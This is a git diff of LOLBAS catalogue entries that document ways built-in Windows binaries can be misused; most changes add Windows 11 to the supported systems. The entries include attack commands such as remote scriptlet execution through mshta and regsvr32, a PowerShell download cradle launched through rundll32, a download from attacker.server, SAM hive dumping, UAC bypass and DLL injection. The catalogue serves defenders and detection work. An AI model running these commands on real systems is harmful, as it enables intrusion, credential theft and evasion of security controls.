OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe

6
yml/OSBinaries/Makecab.yml
View File

@ -10,21 +10,21 @@ Commands:
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
Usecase: Hide data compressed into an alternate data stream
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
Description: Download and compresses the target file and stores it in the target file.
Usecase: Download file and compress into a cab file
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\makecab.exe
- Path: C:\Windows\SysWOW64\makecab.exe

4
yml/OSBinaries/Mavinject.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218.013
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
Usecase: Inject dll file into running process
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\mavinject.exe
- Path: C:\Windows\SysWOW64\mavinject.exe

6
yml/OSBinaries/Microsoft.Workflow.Compiler.yml
View File

@ -10,21 +10,21 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10S
OperatingSystem: Windows 10S, Windows 11
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
Usecase: Compile and run code
Category: Execute
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10S
OperatingSystem: Windows 10S, Windows 11
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
Usecase: Compile and run code
Category: AWL Bypass
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10S
OperatingSystem: Windows 10S, Windows 11
Full_Path:
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
Code_Sample:

4
yml/OSBinaries/Mmc.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218.014
OperatingSystem: Windows 10 (and possibly earlier versions)
OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
- Command: mmc.exe gpedit.msc
Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC.
Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL.
Category: UAC Bypass
Privileges: Administrator
MitreID: T1218.014
OperatingSystem: Windows 10 (and possibly earlier versions)
OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
Full_Path:
- Path: C:\Windows\System32\mmc.exe
- Path: C:\Windows\SysWOW64\mmc.exe

2
yml/OSBinaries/MpCmdRun.yml
View File

@ -18,7 +18,7 @@ Commands:
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\temp\nicefile.txt:evil.exe
Description: Download file to machine and store it in Alternate Data Stream
Usecase: Hide downloaded data inton an Alternate Data Stream
Category: ADS

25
yml/OSBinaries/Msbuild.yml
View File

@ -10,35 +10,35 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: msbuild.exe project.csproj
Description: Build and execute a C# project stored in the target csproj file.
Usecase: Compile and run code
Category: Execute
Privileges: User
MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: msbuild.exe @sample.rsp
Description: Executes Logger statements from rsp file
Usecase: Execute DLL
Category: Execute
Privileges: User
MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo
Description: Executes generated Logger dll file with TargetLogger export
Description: Executes generated Logger DLL file with TargetLogger export
Usecase: Execute DLL
Category: Execute
Privileges: User
MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: msbuild.exe project.proj
Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
Usecase: Execute project file that contains XslTransformation tag parameters
Category: Execute
Privileges: User
MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: msbuild.exe @sample.rsp
Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.
Usecase: Bypass command-line based detections
Category: Execute
Privileges: User
MitreID: T1036
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
@ -69,6 +69,7 @@ Resources:
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
- Link: https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191
- Link: https://github.com/LOLBAS-Project/LOLBAS/issues/165
- Link: https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files
- Link: https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events
Acknowledgement:
- Person: Casey Smith

4
yml/OSBinaries/Msdt.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
Usecase: Execute code bypass Application whitelisting
Category: AWL Bypass
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\Msdt.exe
- Path: C:\Windows\SysWOW64\Msdt.exe

12
yml/OSBinaries/Mshta.yml
View File

@ -10,21 +10,21 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
Description: Executes VBScript supplied as a command line argument.
Usecase: Execute code
Category: Execute
Privileges: User
MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close();
Description: Executes JavaScript supplied as a command line argument.
Usecase: Execute code
Category: Execute
Privileges: User
MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: mshta.exe "C:\ads\file.txt:file.hta"
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
Usecase: Execute code hidden in alternate data stream
@ -43,7 +43,7 @@ Full_Path:
- Path: C:\Windows\System32\mshta.exe
- Path: C:\Windows\SysWOW64\mshta.exe
Code_Sample:
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct
- Code: https://gist.github.com/bohops/6ded40c4989c673f2e30b9a6c1985019
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/05c58b4892942c34bfa01e9ada88ef2663858e1c/rules/windows/process_creation/win_susp_mshta_pattern.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_invoke_obfuscation_via_use_mhsta.yml

8
yml/OSBinaries/Msiexec.yml
View File

@ -10,28 +10,28 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
Description: Installs the target remote & renamed .MSI file silently.
Usecase: Execute custom made msi file with attack code from remote server
Category: Execute
Privileges: User
MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: msiexec /y "C:\folder\evil.dll"
Description: Calls DLLRegisterServer to register the target DLL.
Usecase: Execute dll files
Category: Execute
Privileges: User
MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: msiexec /z "C:\folder\evil.dll"
Description: Calls DLLRegisterServer to un-register the target DLL.
Usecase: Execute dll files
Category: Execute
Privileges: User
MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\msiexec.exe
- Path: C:\Windows\SysWOW64\msiexec.exe

4
yml/OSBinaries/Netsh.yml
View File

@ -8,9 +8,9 @@ Commands:
Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
Usecase: Proxy execution of .dll
Category: Execute
Privileges: User
Privileges: Admin
MitreID: T1546.007
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\WINDOWS\System32\Netsh.exe
- Path: C:\WINDOWS\SysWOW64\Netsh.exe

6
yml/OSBinaries/Odbcconf.yml
View File

@ -5,19 +5,19 @@ Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
- Command: odbcconf -f file.rsp
Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file.
Description: Load DLL specified in target .RSP file. See the payloads folder for an example .RSP file.
Usecase: Execute dll file using technique that can evade defensive counter measures
Category: Execute
Privileges: User
MitreID: T1218.008
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: odbcconf /a {REGSVR c:\test\test.dll}
Description: Execute DllREgisterServer from DLL specified.
Usecase: Execute dll file using technique that can evade defensive counter measures
Category: Execute
Privileges: User
MitreID: T1218.008
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\odbcconf.exe
- Path: C:\Windows\SysWOW64\odbcconf.exe

4
yml/OSBinaries/OfflineScannerShell.yml
View File

@ -2,7 +2,7 @@
Name: OfflineScannerShell.exe
Description: Windows Defender Offline Shell
Author: 'Elliot Killick'
Created: '2021-08-16'
Created: 2021-08-16
Commands:
- Command: OfflineScannerShell
Description: Execute mpclient.dll library in the current working directory
@ -10,7 +10,7 @@ Commands:
Category: Execute
Privileges: Administrator
MitreID: T1218
OperatingSystem: Windows 10
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe
Detection:

2
yml/OSBinaries/OneDriveStandaloneUpdater.yml
View File

@ -2,7 +2,7 @@
Name: OneDriveStandaloneUpdater.exe
Description: OneDrive Standalone Updater
Author: 'Elliot Killick'
Created: '2021-08-22'
Created: 2021-08-22
Commands:
- Command: OneDriveStandaloneUpdater
Description: Download a file from the web address specified in HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC. ODSUUpdateXMLUrlFromOC and UpdateXMLUrlFromOC must be equal to non-empty string values in that same registry key. UpdateOfficeConfigTimestamp is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in %localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json

4
yml/OSBinaries/Pcalua.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: pcalua.exe -a \\server\payload.dll
Description: Open the target .DLL file with the Program Compatibilty Assistant.
Usecase: Proxy execution of remote dll file
@ -24,7 +24,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\pcalua.exe
Code_Sample:

2
yml/OSBinaries/Pcwrun.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\pcwrun.exe
Code_Sample:

4
yml/OSBinaries/Pktmon.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: Reconnaissance
Privileges: Administrator
MitreID: T1040
OperatingSystem: Windows 10 1809 and later
OperatingSystem: Windows 10 1809 and later, Windows 11
- Command: pktmon.exe filter add -p 445
Description: Select Desired ports for packet capture
Usecase: Look for interesting traffic such as telent or FTP
Category: Reconnaissance
Privileges: Administrator
MitreID: T1040
OperatingSystem: Windows 10 1809 and later
OperatingSystem: Windows 10 1809 and later, Windows 11
Full_Path:
- Path: c:\windows\system32\pktmon.exe
- Path: c:\windows\syswow64\pktmon.exe

2
yml/OSBinaries/Pnputil.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: Execute
Privileges: Administrator
MitreID: T1547
OperatingSystem: Windows 10,7
OperatingSystem: Windows 7, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\system32\pnputil.exe
Code_Sample:

6
yml/OSBinaries/Print.yml
View File

@ -10,21 +10,21 @@ Commands:
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe
Usecase: Copy files
Category: Copy
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.
Usecase: Copy/Download file from remote server
Category: Copy
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\print.exe
- Path: C:\Windows\SysWOW64\print.exe

6
yml/OSBinaries/PrintBrm.yml
View File

@ -2,7 +2,7 @@
Name: PrintBrm.exe
Description: Printer Migration Command-Line Tool
Author: 'Elliot Killick'
Created: '2021-06-21'
Created: 2021-06-21
Commands:
- Command: PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip
Description: Create a ZIP file from a folder in a remote drive
@ -10,14 +10,14 @@ Commands:
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder
Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\spool\tools\PrintBrm.exe
Detection:

4
yml/OSBinaries/Reg.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: reg save HKLM\SECURITY c:\test\security.bak && reg save HKLM\SYSTEM c:\test\system.bak && reg save HKLM\SAM c:\test\sam.bak
Description: Dump registry hives (SAM, SYSTEM, SECURITY) to retrieve password hashes and key material
Usecase: Dump credentials from the Security Account Manager (SAM)
Category: Credentials
Privileges: Administrator
MitreID: T1003.002
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\reg.exe
- Path: C:\Windows\SysWOW64\reg.exe

4
yml/OSBinaries/Regasm.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: AWL Bypass
Privileges: Local Admin
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: regasm.exe /U AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the UnRegisterClass function.
Usecase: Execute code and bypass Application whitelisting
Category: Execute
Privileges: User
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe

7
yml/OSBinaries/Regedit.yml
View File

@ -10,17 +10,16 @@ Commands:
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: regedit C:\ads\file.txt:regfile.reg
Description: Import the target .REG file into the Registry.
Usecase: Import hidden registry data from alternate data stream
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\regedit.exe
- Path: C:\Windows\SysWOW64\regedit.exe
- Path: C:\Windows\regedit.exe
Code_Sample:
- Code:
Detection:

2
yml/OSBinaries/Regini.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\regini.exe
- Path: C:\Windows\SysWOW64\regini.exe

2
yml/OSBinaries/Register-cimprovider.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\Register-cimprovider.exe
- Path: C:\Windows\SysWOW64\Register-cimprovider.exe

10
yml/OSBinaries/Regsvcs.yml
View File

@ -8,19 +8,19 @@ Commands:
Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting
Category: Execute
Privileges: Local Admin
Privileges: User
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting
Category: AWL Bypass
Privileges: Local Admin
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\regsvcs.exe
- Path: C:\Windows\SysWOW64\regsvcs.exe
- Path: c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe
- Path: c:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe
Code_Sample:
- Code:
Detection:

8
yml/OSBinaries/Regsvr32.yml
View File

@ -10,28 +10,28 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting
Category: AWL Bypass
Privileges: User
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll.
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
Category: Execute
Privileges: User
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting
Category: Execute
Privileges: User
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\regsvr32.exe
- Path: C:\Windows\SysWOW64\regsvr32.exe

4
yml/OSBinaries/Replace.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: Copy
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
Description: Download/Copy bar.exe to outdir
Usecase: Download file
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\replace.exe
- Path: C:\Windows\SysWOW64\replace.exe

4
yml/OSBinaries/Rpcping.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: Credentials
Privileges: User
MitreID: T1003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM
Description: Trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign not Set).
Usecase: Relay a NTLM authentication over RPC (ncacn_ip_tcp) on a custom port
Category: Credentials
Privileges: User
MitreID: T1187
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\rpcping.exe
- Path: C:\Windows\SysWOW64\rpcping.exe

18
yml/OSBinaries/Rundll32.yml
View File

@ -10,56 +10,56 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.
Usecase: Execute DLL from SMB share.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
Usecase: Execute code from Internet
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
Usecase: Proxy execution
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
Usecase: Proxy execution
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
Usecase: Execute code from Internet
Category: Execute
Privileges: User
MitreID: T1218.011
